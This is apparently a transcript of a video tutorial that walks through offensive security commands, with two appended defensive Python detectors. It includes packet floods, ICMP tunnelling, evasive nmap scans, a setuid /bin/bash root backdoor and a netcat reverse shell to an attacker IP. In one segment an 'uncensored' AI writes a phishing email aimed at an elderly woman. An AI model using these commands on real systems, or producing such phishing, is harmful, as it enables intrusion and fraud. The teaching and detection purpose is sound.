Here are the top 60 hacking commands you need to know. I also brought in a few experts, so get your coffee ready. If you want to try these commands right now, I've got a free Kali Linux sandbox in the description. Just click that link and, right here in your browser, boom, hacking environment. Make sure you read the instructions.
You get two hosts to hack with. Also, all the commands in this video are in the description below. We even created this beautiful top hacking commands cheat sheet. You've got to have this.

The humble ping command. We ping a host to see if it's up, and if it's up, we'll hack it. But right now we're sending a 64-byte packet. What do you say we send something bigger to test firewall capabilities? We can type in -s and specify the size of our packet, testing the capabilities of a firewall, or we can get even crazier. We'll still send our large packet, -s 1300, but then we'll use the switch -f to absolutely obliterate this host: flood it with a ton of packets. And actually, before we do that, I want to see this happen. I'll start another terminal and give you a bonus command here. This tool is called iftop. I'll install it with apt install iftop and then type in iftop to run it. Now let's flood. Look at that. That's a lot of data. Ctrl+C to stop that. Same for iftop. Goodbye. And actually, let's keep iftop up because we're not done with ping yet.

I know you didn't realize there's so much to ping, and this tool is kind of crazy. It's called hping3. We'll install it with apt install hping3. And we can do fun things like flooding packets on a specific port. For example, -p 80, -S for a TCP packet, -V for verbose mode, which gives us more, --flood to make it rain, and finally the host. Here we go, man, look at that.
And we're hitting port 80. Great for testing web servers. We can also use hping3 for a fancy traceroute: --traceroute, -V, and then here's what's cool. We'll do -1 for ICMP packets and then our host, networkchuck.coffee. But sometimes firewalls block that. With traceroute, removing -1, we can instead do -p 80 and -S, doing traceroute on port 80, which is web traffic, using of course TCP. And pick your port: maybe 443, maybe 53. Use the UDP option, specifying UDP traffic, or with TCP traffic we can add the -A switch, setting the ACK flag, and then change our base port with --baseport 1337. All amazing options to help us evade firewall rules.

Now I bet you thought we were done with ping, but we're not. You can tunnel TCP packets over ICMP echo reply and request packets. What? Check this out. It happens with the tool called ptunnel: apt install ptunnel. On the target side, we'll simply run ptunnel. On the attacker side we'll run ptunnel -p for the proxy address (it'll be our target), -lp to specify our local port (we'll do 8000), -da for our destination address (it'll also be our target), and we'll do -dp for our destination port. And because I'm going to try SSH, I'll do port 22. Ready, set, tunnel. Now to watch this happen in real time, I'm going to show you a new command. tcpdump will help us capture and visualize these packets in real time. We'll use apt install tcpdump to install it, and then we'll run tcpdump -i for interface and we'll say any. And we're only looking for ICMP traffic, so we'll type in icmp. Now watch this. I'll open a new terminal. Now I'm going to go over this tunnel using ICMP packets. Oh my gosh, check this out. ssh -p, specifying 8000, and I'll do username networkchuck (that's my username at the other host) at localhost, pointing it right here on this computer, this server. Ready, set, go. Do you see it happening? Oh my stinking gosh. Literally sending SSH traffic over ICMP echo reply and echo request. That's magic. whoami, ip address. Yep, I'm somewhere else. That's so cool. And Ctrl+C to close those tunnels on both sides. This is great for evading firewalls that might block that type of traffic.

Here's a quick command from Tom nom nom nom nom. No, no. I'm Tomnomnom, and this is a trick I use all the time. If you're running a command and you don't know what you want to do with the output yet, pipe it to vim -. That'll open the output of the command in Vim, and then you can either manually edit it or you can use :%! to run it back through any command you want. Run it through sort to put things in order, or grep -v to remove lines you don't want. And then as a bonus, if you have a file name under your cursor, hit g then f to open that file in a new buffer.

Nmap will scan a network, helping us to discover hosts that we can hack. Here are some fun ways to use it. First, make sure you install it: apt install nmap. We can scan an entire network for quick mapping with nmap -sn and then our target network. Hey, it found 11 hosts. The switch -sV will do service discovery on a target. Works like a charm. Use the -O switch for OS detection. Well, hold up, we tried, but it's blocking ping probes. Let's try -Pn to not do the probe. We'll add that to our command, -Pn. Bam. We got it, it's a Windows PC. We can use the -sL switch to do quick hostname scanning on a network. Nmap scripts unlock a whole new world. We can scan for vulnerabilities on a host with --script vuln and then our target host or network. We can use the malware script to scan for known malware. With the -A switch, we can scan for pretty much everything. Take a little coffee break, it'll take a while. This one switch does OS detection, version detection, some default script scanning from Nmap, and the traceroute. That's a lot of info. That's awesome.
If we use the -f switch, it'll fragment our packets and make it harder for us to be detected while we're scanning. We can also avoid detection by changing our source port. Using the --source-port switch, we can just say, hey, I'm DNS, don't mind me. And if you really want to be tricky with Nmap, you can scan with decoys. Check this out: nmap -D for decoys and then specify RND, all capital, and let's say 10. What that will do is generate 10 random IP addresses, random decoys that you're scanning from, so they can't find you. We'll put our host in and then bam, scanning from 10 different IP addresses.

Now Nmap is cool, but what if you have a lot to scan, like networks upon networks, and you want to scan them fast? That's where masscan comes in. We'll install masscan with apt install masscan. Masscan is similar to Nmap in that we can specify ports to scan for and specify a network, but then we can specify our rate and go super fast, just like that. Or if we have no idea what networks we're dealing with, we can scan everything by the entire 10.x range and we'll do a rate of 10,000. Now it is fast, but you still might want to take a coffee break, just saying. We'll just Ctrl+C that. We could also use the --randomize-hosts switch to change the order in which we scan our hosts or networks, helping us stay a bit more hidden. Or we can quickly find servers foolishly running telnet on a network. Super insecure, but we can find that out right now simply by specifying port 23 and scanning an entire network fast. Got one.

Now here's John Hammond with something a bit silly, but I love it though. You normally just enter ls on the command line to list stuff in the current directory. Well, did you know that there is actually an sl command? Like if you were typing really fast, or you accidentally made a mistake, or you had a typo when you meant to type ls and you accidentally typed sl: this is the steam locomotive, and it is a train that is displayed on your computer screen, on the command line, on the terminal. And look, you can't get out of this. You can't type anything, you can't do anything. You just have to wait for the whole train to drive by. Now the next fun hacking command that I want to show you is actually part of the /dev piece of the file system. I don't know if you're familiar, but there is a /dev/urandom file, and that is like a device to list out pseudorandom data just coming from your computer, right? Hey, you have a stream, a constant stream of randomness, and this looks hysterical. It is just gibberish, nonsense, zeros and ones and all the data up to 255, ASCII characters, printable and non-printable. And it just looks like absolute chaos. You can Ctrl+C out of this, but sometimes it might break the terminal and you can't actually continue to interact with the shell. So it's something that you might be able to do as a troll, as a meme, right? So what if we actually set an alias for that same ls command? Maybe we could set that to sl if we wanted to run the steam locomotive train again, but we could set that to cat /dev/urandom, and now any time someone were to actually enter ls on the command line thinking that they're going to list files, it'll just spit up and go crazy with all that random gibberish nonsense. I think that's kind of fun.

By the way, John Hammond will show us a real hacking command he loves later in the video. The whois command will tell you a ton of stuff about a domain. Install it with apt install whois. whois microsoft.com: fax number, phone number, address. Let's try cia.gov. Redacted. Should have expected that. WhatWeb will tell you what technologies a website is using. apt install whatweb to install it, and then we'll type in whatweb and our domain. We'll try networkchuck.coffee. And while that's scanning, perfect time for a coffee break. It gives you a ton of information, including the fact that it's powered by Shopify, right there.

Next up, curl from NahamSec. My favorite command is actually not using any hacking tools, and it's probably one of the most basic commands used on Linux, and it comes by default on almost any operating system, and that is the curl command. And let me show you real quickly how I use it. The first thing I want to do, usually, is just a curl -I. That usually gives you the headers and every response in that header of what is coming back from the server. So in this case it's giving us a 302 and it's saying, hey, you are going to get redirected to this exact location. And I like doing curl a lot because I'm hacking a lot of APIs most of the time, and with APIs I want to just quickly see if an endpoint is accessible or if I can fetch some sort of data. And a lot of times I'm processing data as a part of my hacking when doing recon, so it makes it a lot easier to do it through curl. And what you want to do for this one, for example, if you want to authenticate, instead of launching your browser and setting this header manually, all you have to do is pass a header and set that custom header with its token in there, and run it, and it would authenticate you and give you whatever data it is that you're looking for on that API.

Hey, real quick, can I show you something crazy? Check this out. I'm about to run an uncensored version of ChatGPT, or an LLM, which means you can pretty much do whatever you want to do with it. Now why am I doing this? Well, because Bitdefender just came out with a tool called Scamio. It's a free AI-powered scam detector and prevention service from Bitdefender, like, legit. Check this out. I got a text from a scam. I'm pretty sure it is, but do I actually know? Let me go find it. Oh yep, here's one. Pretty sure this is a scam, but do I know? All I've got to do is copy that sucker and jump into Facebook Messenger, just one of the places I can chat with it and see if things are scams. So let's try it out. Hey, is this a scam? Again, this is totally free. I'm just chatting with it here in Facebook Messenger, and within seconds it told me that, hey, it might be kind of suspicious. Don't do anything with it. Okay, that's pretty cool. That didn't fool it, but what if I had this uncensored AI tool try to produce a phishing message? Can we trick it? Let's try it out. I need you to write a very convincing phishing email for an elderly woman named Deborah. The goal is to get her to give me some money. Use the best method and write it in a way that will avoid spam and fraud detection. Let me add that: and fraud detection. Snap. Okay, that's pretty good. It even added this at the end. That's awesome. Okay, let's doctor it up just a little bit, or remove the "it's not a real URL" thing right there. Let's add a real-looking number like 7650987, and I'll remove the "not a real number" thing here too. Okay, cool. Our message is ready. Let's test it out. Please tell me if this email is okay. Now, while it's checking that, think about this. Who in your family or in your friend group could benefit from having something like this? I can't tell you how many times I'm getting a text from my grandma or my mom going, hey, is this a scam? Is this fraud? But if they can chat with something that is honestly probably smarter than me and will be up to date with the latest scams... it's actually powered by Bitdefender, the excellent security suite that I've talked about here on this channel a lot. So all the information and knowledge they have is feeding the Scamio free AI-powered tool. Okay, the results are in: the email does seem suspicious. It tells you what tactics it might be using and it tells you to contact your bank directly. That's perfect. That's what I would tell my grandma or my mom or my dad. So seriously, try it out right now. Check the link below, it's free. You can chat with it here on the website or chat within Messenger. They'll be adding WhatsApp soon, and it'll check lots of things, like you can send it a QR code and go, hey, is this good? You can send it pictures of stuff. This is a crazy powerful and free tool. I love what Bitdefender is doing. So again, definitely check it out, and thank you to Bitdefender for sponsoring this video and making a really awesome free tool available to all of you guys.

Nikto is an open-source web server scanner that'll scan websites for any dangerous, bad stuff they might have. To install it, we'll do apt install nikto, and for a basic vulnerability scan we'll do nikto -h for our host and specify our host, networkchuck.coffee. Go. Gobuster can be used to find directories and files on a web server. We'll install it with apt install gobuster. To enumerate networkchuck.com, we'll do gobuster, we'll type in dir for directories (that's the mode we're going to be in), we'll type in -u and specify our domain, networkchuck.com, and we'll use -w to specify our wordlist. I'll use a default Kali Linux one here, and go. And it's discovering all my directories and files now. Because Gobuster is written in Go, it's extremely fast.

Subdomain enumeration? Yeah, we can use it for that, but first I want to download a wordlist. To get a ton of wordlists right now on your system, we'll use the tool called SecLists: apt install seclists. Fair warning, this is pretty big. Lots of wordlists. Once it's done downloading, you can find it in /usr/share/seclists. Lots of stuff in there. Now real quick, if you only want to download one thing, the thing that we care about, there's a command for that. It's called wget. SecLists is also on GitHub, and it's maintained by my friends. What we care about is Discovery and DNS, and we'll get Jason Haddix's list here. I'm going to grab the raw URL. To install wget: apt install wget. Kind of seeing a pattern here, right? Type in wget, paste that URL. Got it.

Now getting back to Gobuster, we can enumerate domains. We'll type in gobuster, mode dns. We'll specify our domain with -d networkchuck.com and then our wordlist with -w. I'll use Jason Haddix's DNS list. Ready, set, go. Now that's a pretty big list, and if I were doing a legit pentest, I'd probably let this finish out, but I don't have time for that. I'm not patient enough. Ctrl+C to stop that. I want to show you another way to do subdomain enumeration. This tool is called Sublist3r. You can install it with apt install sublist3r, just like this, and the E is a three. And then to run Sublist3r, we'll simply type in sublist3r -d to specify our domain, networkchuck.com, and let it go. And it found a lot of stuff.

This next one is pretty fun. It's called WPScan. It will scan WordPress sites and help you find all the issues that might be affecting them. Great if you're a WordPress site owner, and great if you're a pentester. Let's try it out. We can run it in a few ways. The first way: wpscan, we'll do --url and specify our URL. We'll do chuckkeith.com, my personal website that's not doing anything. And then we'll do --enumerate u, not "you", the letter u. The u stands for users. Let's try it out. That's a lot of information. We can also use the p option for plugins. We can use t for themes, or do something pretty aggressive. We'll do vp, vt, --plugins-detection, and we'll add aggressive at the end just to make sure we get our point across. This is a super aggressive vulnerability scan. Let's try it out. Now you may have noticed that all those commands did not output anything fun, because you need an API token from WPScan, which you can get for free right now. And then you would run the commands like this, specifying your API token with the --api-token switch.

Amass is another tool you can use for subdomain enumeration. Install it with apt install amass, and to run it we'll type in amass enum -d, specify our domain, networkchuck.com, and let it go. This tool might run forever. Alright, I don't want to wait for it though. Ctrl+C to stop that. But man, look at all the stuff. To do a more passive enumeration, you can do amass and we'll specify -passive and then our domain, whereas the other one was a bit more active. I like Amass because it does give us options based on what our scope is, and we'll go ahead and stop that.

This next command opens up the door to new commands. What does that mean? You'll see. It's a tool called git, which we'll often use when you first start out to interact with GitHub. Let me show you. There's a tool we're about to use called searchsploit, but the way we use this tool is by downloading it from GitHub. And actually, I lied, this is a GitLab repository, but it's pretty much the same thing. You'll use git all the time to install all kinds of stuff, but first we have to install git: apt install git. You probably already have it. And then probably my favorite command is git clone. We're going to clone a tool onto our computer, and in our case it will be searchsploit. Let's go. To properly use that command, we'll add a symbolic link. We're not going to talk about that, just know it's a command below. And then finally we can use the command searchsploit. Right? Yeah, it's going to work. Let's try searching for WordPress plugins. It'll search for exploits that involve WordPress plugins. What about SSH? A ton of exploits pertaining to SSH. Super handy tool. If you want to update the database: searchsploit -u. Crazy powerful tool.

Now here's John Hammond with a real hacking command.
It's kind of awesome. Let me get into the real, genuine ethical hacking and penetration testing, my favorite top hacking command. Here's the thing: when you're on the command line interacting with the shell, you're actually running this program called Bash, or the Bourne-again shell. Now that lives on the file system in /bin/bash. So if I were to actually execute this, it doesn't look like it does anything. I just get the prompt back, because I've just invoked and I'm running a shell or terminal inside my shell, so I could exit out of that and get back to my original prompt. But /bin/bash actually takes a special argument called -p, and that will enforce and maintain setuid permissions, which means that the owner of the file, root in this case, the admin, absolute controller of the computer, will be able to keep their permissions. But it has to be a setuid binary. So the way that we could do that is to actually chmod, or change mod, change modifications on the file and add, or plus, the s letter for setuid. We'll put that on /bin/bash, and this will require some root privileges. That means that you need to be the admin to be able to configure this. But what that ultimately does is create a backdoor, or you have a persistence mechanism, a little bit of a foothold, so that at any point, if we configure this with our sudo password, later on down the line you get access to this machine one more time. Now you can just run bash -p and you are root. You control the whole machine because you are the admin user. You set up that backdoor. If you wanted to, you could move into the root directory and you could do anything that you want. Maybe we could echo hello into a "please subscribe to NetworkChuck" file. I'll hit enter on that. And now if I zoom out, let me show you this. ls -la. We can see our file right there, "please subscribe to NetworkChuck". Hey, just owned and controlled by the root user, and we were able to configure that with our backdoor: sudo chmod +s /bin/bash. That is my favorite top hacking command, because then you've got a backdoor, you've got a persistence mechanism, and a way to become root at any point. I hope you enjoyed a couple of those.
Really neat, hey, top hacking commands. But thank you so much, NetworkChuck, for letting me join the party here. This was an absolute blast.

Now I'm going to do something bad. I'm going to do the same command twice. What? No, I know. It's okay. We're going to talk about tcpdump again. Why? Well, because there's more cool stuff about it and we didn't give it enough time. We'll type in tcpdump, we'll type in -w to send it to a file, we'll just call it capture.pcap, then -i for our interface, and we'll do eth0. That's the one I have. Now let me just make sure that's the case: ip address. Yes, eth0. And go. And we'll generate some traffic. Do something fun that we've already learned: nmap with random addresses, decoys. We'll stop that with Ctrl+C. We can analyze that traffic with this command: tcpdump -r, specify our capture file, which is just capture.pcap. Let's take a look. Cool. We can see it. We can also limit the amount of packets we capture with tcpdump and the switch -c for count, and we'll say like 100. That did not take long.

Now tcpdump is pretty cool, great for quick captures, but the real tool you want to use that's crazy powerful is tshark, the command-line brother of Wireshark. To install tshark, we'll do apt install tshark. tshark can do a lot. Let's try a few things. First, we'll type in tshark and we'll capture one packet, just one. We'll put it in verbose mode with -V, we'll do -c for count, we'll do one, and then -i eth0. One packet captured. And then look at all the stuff it shows us. That is so powerful. Networking geeks are just drooling. So yes, I'm drooling. Do you want to see something crazier? Filters. Watch this. tshark, we'll do a -Y to apply a display filter, and with this single quote we'll specify, we'll do http.request.method, space, equals equals, and in double quotes GET, and then close it out with a single quote. I know it's kind of wordy, but check this out. Let's specify our interface, eth0, and we're now capturing, only showing GET requests. How cool is that? Let's generate some: curl academy.networkchuck.com. There's another one. That's so cool. Now one of the most powerful ways we can use tshark is by analyzing packet captures. So let's do a capture real quick to a file. tshark... and actually, no, I'm going to show you one cool thing. We'll use a command called timeout and put in 15 seconds, and it'll time out, or stop this packet capture, in 15 seconds. That's pretty cool. tshark -i eth0, and with a -w command similar to tcpdump we'll send that to a file, tshark.pcap. Let me try to generate some quick traffic, and done. To display statistics, and specifically to follow endpoint connections, use this command: tshark -r, we'll specify our capture, which was tshark.pcap, then we'll use the switches -qz and specify endpoints,ip. How cool is that? We could also follow a TCP stream with tshark -r capture -qz and we'll say follow,tcp, and we'll put that in ASCII. So ascii, we'll do a comma, we'll follow the seventh stream. That's pretty cool. Let's try, I dunno, the first stream. First stream's crazy. Let's do the 20th stream, the hundredth stream. So powerful. We can also simply do custom output of fields based on the capture we're reviewing. Check this out: tshark, do a -e ip.src, -e ip.dst, -e frame.protocols. Notice we're specifying fields. We'll do a -T fields, which is telling it to only output the fields we're specifying. And then finally -r, specifying our capture. How cool is that? So powerful.

This is my new favorite tool: tmux, a terminal multiplexer. Install tmux with apt install tmux, and then simply type in tmux. We suddenly have a new terminal that we can do stuff in, like ping academy.networkchuck.com. Leave that there. Hit Ctrl+B and then D on your keyboard, and you're detached from it. And then with tmux a, get right back to it. How powerful is that? I'll stop. Type in exit to close that out. We can create multiple sessions and name them. So tmux new -s and name it Bob. Here's Bob. We'll ping something here. Detach from that for another session, Susie. Now if I type in tmux ls, I've got two sessions and I can reattach to either of them: tmux a -t to specify my target, we'll say Susie, jumping right back in there. I can hit Ctrl+B and then W to quickly jump between my various tmux sessions, and I can leave, go to another computer, jump back in here and connect to any one of these sessions. If you want to learn more, I did a whole video on tmux, right up here.

SSH. We use it all the time to remote into our systems. So for example, this Ubuntu guy: to jump into him, I'll use ssh networkchuck at his IP address. Already? Cool. But it can do more. Instead of logging in, I can actually just run a command via SSH on another system: ssh networkchuck at my server, and then right after that specify the command I want to run. So in single quotes I can say whoami. Bam. Or ip address. Crazy powerful. Let's get crazier. You can actually make it a SOCKS proxy. What? Watch this. Before I create the tunnel, let me demonstrate my location right now: what's my IP address? I'm in Dallas, Texas, as you can see right here. But if I use this crazy SSH command, I'll create a proxy and tunnel myself somewhere else. ssh -D, which is telling it to create a SOCKS proxy, and I'll say port 1337. We'll do a -C for compression, -q for quiet mode, and -N to not execute any commands. And finally our server information: root at, and this will be a server in Japan. Put our password in. Now we're going to launch Chromium using that proxy, our SOCKS5 proxy at localhost. Ready, set, go. Chromium's launched. Now I'll see where we are. Already feel a bit different, and it's having a hard time figuring out where to go. I'm definitely in Osaka, Japan. Super cool, right?

Netcat, our go-to for reverse shells. To install netcat, we'll do apt install netcat-traditional. To verify, just type in nc -h. And with netcat installed on both your attacking computer and your target computer, let's do a reverse shell. On the attacker, all we've got to do is wait, wait for the shell. Type in nc -lvp and the port you're waiting on, 1337. We're waiting because on a reverse shell, the target reaches out to us. On the target side, we'll type in nc for netcat, we'll do a -e and specify the shell we want to have access to, so we'll do /bin/sh, specify our attacker IP, which is us, and the port 1337 that the attacker is listening on. And then hit enter. Did something happen? It sure stinking did. Check it out. I'm on the other computer. I've got a reverse shell. You can also do a fun thing where you just set up a simple chat server with netcat. Why? I don't know. But you can do it. You should try it. It's fun. On one side you type in nc -lvp and set up a port. On the other side, type in nc -v, the IP address of the other computer, and the port. So now I can say hey, and I get hey on the other side. What are you thinking about the end of this video? Me too. I'll catch you guys next time. For real though.
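Added example, not part of the video: a defender-side look at the ptunnel demo and the tcpdump/tshark segments. The video shows SSH riding inside ICMP echo request/reply packets and then watches it with tcpdump -i any icmp. This Python checker parses lines in the one-line format tcpdump prints for ICMP echo traffic and flags a flow when its echo packets are far larger than a stock 64-byte ping or arrive much faster than a human-driven ping would. The sample lines, the two thresholds and the 10.0.0.x addresses are constructed for the example and are my own choices, not values from the video.

```python
import re
from collections import defaultdict
from dataclasses import dataclass, field

# One-line tcpdump summary for ICMP echo traffic, e.g.
#   12:00:01.000000 IP 10.0.0.5 > 10.0.0.9: ICMP echo request, id 1234, seq 1, length 64
ICMP_ECHO = re.compile(
    r"^(?P<hh>\d{2}):(?P<mm>\d{2}):(?P<ss>\d{2}\.\d+) IP (?P<src>[\d.]+) > (?P<dst>[\d.]+): "
    r"ICMP echo (?P<kind>request|reply), id (?P<id>\d+), seq (?P<seq>\d+), length (?P<len>\d+)$"
)

MAX_NORMAL_LEN = 128     # stock ping is 64 bytes (56-byte payload + 8-byte ICMP header)
MAX_NORMAL_RATE = 20.0   # echo packets per second per flow before we call it suspicious

# Constructed sample capture: a normal ping exchange, a tunnel-like burst of
# large echo requests, and one non-echo ICMP line the parser must skip.
SAMPLE_LINES = (
    [f"12:00:0{i}.000000 IP 10.0.0.5 > 10.0.0.9: ICMP echo request, id 1234, seq {i}, length 64"
     for i in range(1, 5)]
    + [f"12:00:0{i}.000300 IP 10.0.0.9 > 10.0.0.5: ICMP echo reply, id 1234, seq {i}, length 64"
       for i in range(1, 5)]
    + [f"12:00:05.{i * 20000:06d} IP 10.0.0.7 > 10.0.0.9: ICMP echo request, id 4321, seq {i + 1}, length {900 + 100 * i}"
       for i in range(6)]
    + ["12:00:06.000000 IP 10.0.0.9 > 10.0.0.5: ICMP 10.0.0.9 udp port 53 unreachable, length 36"]
)


@dataclass
class Flow:
    times: list = field(default_factory=list)
    lengths: list = field(default_factory=list)


def parse_line(line):
    """Return (src, dst, kind, seconds_since_midnight, length) or None for non-echo lines."""
    m = ICMP_ECHO.match(line.strip())
    if not m:
        return None
    secs = int(m["hh"]) * 3600 + int(m["mm"]) * 60 + float(m["ss"])
    return m["src"], m["dst"], m["kind"], secs, int(m["len"])


def analyze(lines):
    """Group echo packets per (client, server) flow and return the suspicious ones."""
    flows = defaultdict(Flow)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        src, dst, kind, t, length = rec
        # A reply flows server -> client; normalise so both directions share one key.
        key = (src, dst) if kind == "request" else (dst, src)
        flows[key].times.append(t)
        flows[key].lengths.append(length)

    findings = []
    for (src, dst), f in flows.items():
        reasons = []
        biggest = max(f.lengths)
        if biggest > MAX_NORMAL_LEN:
            reasons.append(f"oversized echo packet ({biggest} bytes)")
        span = max(f.times) - min(f.times)
        rate = len(f.times) / span if span > 0 else float(len(f.times))
        if rate > MAX_NORMAL_RATE:
            reasons.append(f"high rate ({rate:.0f} pkt/s)")
        if reasons:
            findings.append({"src": src, "dst": dst, "packets": len(f.times), "reasons": reasons})
    return findings


if __name__ == "__main__":
    # Real use: tcpdump -i any -l icmp | python3 this_script.py  (reading sys.stdin)
    for hit in analyze(SAMPLE_LINES):
        print(f"{hit['src']} -> {hit['dst']}: {hit['packets']} echo packets; " + "; ".join(hit["reasons"]))
```

Note that the oversized-packet rule also lights up for the ping -s 1300 flood from earlier in the video, which is fine: both are traffic a firewall that "allows ping" was never meant to pass, and the two reasons together separate a tunnel from one odd large ping.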
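Added example, not part of the video: the detection side of John Hammond's favorite command. sudo chmod +s /bin/bash followed by bash -p gives a persistent root shell, so a defender's periodic check is "which files carry the setuid bit, is any of them a shell or interpreter, and did anything appear that was not there when the box was built". The shell name list, the baseline set and the /usr/bin path in the usage block are constructed assumptions for this example, not anything the video specifies.

```python
import os
import stat

# Shells and interpreters that should never carry the setuid bit. With
# bash -p a setuid-root bash keeps root's privileges, which is exactly the
# persistence backdoor described in the video. Constructed list for the example.
SHELL_NAMES = {"bash", "sh", "dash", "zsh", "ksh", "fish", "python", "python3", "perl", "ruby"}


def classify(path, mode, owner_uid):
    """Describe a file if it is a setuid binary, else return None.

    `mode` is a full st_mode value (file-type bits included) and `owner_uid`
    the owning uid, so the rule can be tested without touching the disk.
    """
    if not stat.S_ISREG(mode) or not mode & stat.S_ISUID:
        return None
    name = os.path.basename(path)
    stem = name.split(".")[0]          # python3.11 -> python3, bash -> bash
    owner = "root" if owner_uid == 0 else f"uid {owner_uid}"
    if stem in SHELL_NAMES:
        return f"setuid shell/interpreter owned by {owner}"
    return f"setuid binary owned by {owner}"


def find_setuid(root):
    """Walk `root` and return [(path, description)] for every setuid file."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            path = os.path.join(dirpath, fn)
            try:
                st = os.lstat(path)    # lstat: a symlink's own mode, never the target's
            except OSError:
                continue
            desc = classify(path, st.st_mode, st.st_uid)
            if desc:
                found.append((path, desc))
    return found


def review(found, baseline):
    """Split findings into (shells, new_vs_baseline).

    `baseline` is the set of setuid paths recorded on a known-good build of the
    same image; anything outside it deserves a look even if it is not a shell.
    """
    shells = [f for f in found if "shell" in f[1]]
    new = [f for f in found if f[0] not in baseline]
    return shells, new


if __name__ == "__main__":
    # Constructed baseline; on a real host capture it from a freshly built system and scan /.
    baseline = {"/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su"}
    shells, new = review(find_setuid("/usr/bin"), baseline)
    for path, desc in shells + new:
        print(path, desc)
```

Running find_setuid against / from cron and diffing against the baseline is the cheap version of what file-integrity tools do for this exact case; the shell check is what catches the video's chmod +s /bin/bash even on a host whose baseline was never recorded.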